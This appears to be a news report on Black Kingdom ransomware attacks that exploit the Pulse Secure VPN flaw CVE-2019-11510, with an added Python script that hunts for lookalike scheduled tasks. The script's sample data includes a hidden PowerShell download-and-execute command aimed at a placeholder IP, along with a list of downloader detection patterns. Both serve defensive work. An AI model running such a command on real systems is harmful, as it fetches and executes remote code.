Researchers at REDTEAM.PL, a Polish cybersecurity firm, have observed Black Kingdom ransomware attacks that exploit a vulnerability in Pulse Secure VPN products that was patched last year.
Tracked as CVE-2019-11510 and with a CVSS score of 10, Pulse Secure’s vulnerability was the most serious of several security flaws identified in enterprise VPNs.
An arbitrary file read issue, the bug could allow unauthenticated attackers to exfiltrate credentials that can then be used to compromise private VPN networks in combination with a remote command injection vulnerability in Pulse Secure products (CVE-2019-11539).
Pulse Secure released patches for the identified issues in April 2019, and said most customers had already installed them in August 2019. However, some organizations still don’t seem to have patched their systems.
In a warning issued earlier this year, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) cautioned that patching vulnerable VPNs alone would not be enough to keep attackers out, especially where the vulnerability had already been exploited to steal credentials before the patch was applied.
The first attacks targeting this vulnerability were observed in August of last year, and targeting has continued to date, with state-sponsored actors joining the fray since late 2019. In January, security researchers revealed that the operators of the Sodinokibi ransomware had begun targeting the flaw.
Now, REDTEAM.PL says the threat actor behind the Black Kingdom ransomware is also exploiting CVE-2019-11510 to compromise enterprise infrastructure.
After the initial compromise, the attackers achieve persistence with a scheduled task named GoogleUpdateTaskMachineUSA. The name closely resembles that of a legitimate Google Chrome update task, which ends in UA rather than USA.
The malicious task runs a PowerShell script that downloads additional code from an IP address that is also used to launch network attacks. Once running on a compromised system, the ransomware appends the .blackkingdom extension to the files it encrypts.
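The persistence technique above (a scheduled task whose name is one character off from a legitimate Google Update task, with a PowerShell download command as its action) is straightforward to hunt for in a task inventory. The following detection script is an added example, not code from REDTEAM.PL or from the article; the legitimate task names it whitelists are the standard Google Update task names, and the sample task records, including the IP address and command lines, are constructed for illustration.

```python
"""Flag scheduled tasks that imitate legitimate Google Update task names
and whose action launches a PowerShell download-and-execute command.

Example code added for illustration; the task records below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Legitimate Google Update scheduled task names (exact matches are benign).
LEGIT_GOOGLE_TASKS = {"GoogleUpdateTaskMachineUA", "GoogleUpdateTaskMachineCore"}

# PowerShell fragments that typically indicate a downloader / in-memory loader.
DOWNLOAD_PATTERNS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|"
    r"Start-BitsTransfer|\biex\b|Invoke-Expression)",
    re.IGNORECASE,
)


@dataclass
class ScheduledTask:
    name: str
    command: str  # the task action: executable plus its arguments


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot near-miss names such as ...UA vs ...USA."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(task: ScheduledTask) -> List[str]:
    """Return the list of findings for one task (empty list means nothing suspicious)."""
    findings = []
    # A name within two edits of a legitimate task, but not equal to it, is a lookalike.
    if task.name not in LEGIT_GOOGLE_TASKS and any(
        levenshtein(task.name, legit) <= 2 for legit in LEGIT_GOOGLE_TASKS
    ):
        findings.append("lookalike-name")
    # A PowerShell action that fetches or evaluates remote content is a downloader.
    if "powershell" in task.command.lower() and DOWNLOAD_PATTERNS.search(task.command):
        findings.append("powershell-downloader")
    return findings


def triage(tasks: List[ScheduledTask]) -> Dict[str, List[str]]:
    """Map task name -> findings, keeping only tasks with at least one finding."""
    result = {}
    for task in tasks:
        findings = classify(task)
        if findings:
            result[task.name] = findings
    return result


# Constructed sample inventory (the IP is from the TEST-NET-3 documentation range).
SAMPLE_TASKS = [
    ScheduledTask(
        "GoogleUpdateTaskMachineUA",
        r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler',
    ),
    ScheduledTask(
        "GoogleUpdateTaskMachineUSA",
        "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
        ".DownloadString('http://203.0.113.10/update.ps1')",
    ),
    ScheduledTask("MicrosoftEdgeUpdateTaskMachineUA", r'"C:\Edge\MicrosoftEdgeUpdate.exe" /ua'),
    ScheduledTask("NightlyBackup", r"powershell.exe -File C:\scripts\backup.ps1"),
]


if __name__ == "__main__":
    for name, findings in triage(SAMPLE_TASKS).items():
        print(f"{name}: {', '.join(findings)}")
```

On a live host the inventory would come from `schtasks /query /fo CSV /v` or PowerShell's `Get-ScheduledTask` piped with `Get-ScheduledTaskInfo`, parsed into `ScheduledTask` records. The two checks are independent on purpose: a lookalike name with a benign action still deserves a look, and a PowerShell downloader under an unremarkable name is the more common case.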
The attackers are demanding $10,000 in Bitcoin in the ransom note dropped by the malware, claiming they would destroy all the victim’s data if the ransom is not paid in 600 minutes. The victim is directed to contact the threat actor through the blackingdom e-mail address at gszmail[.]com.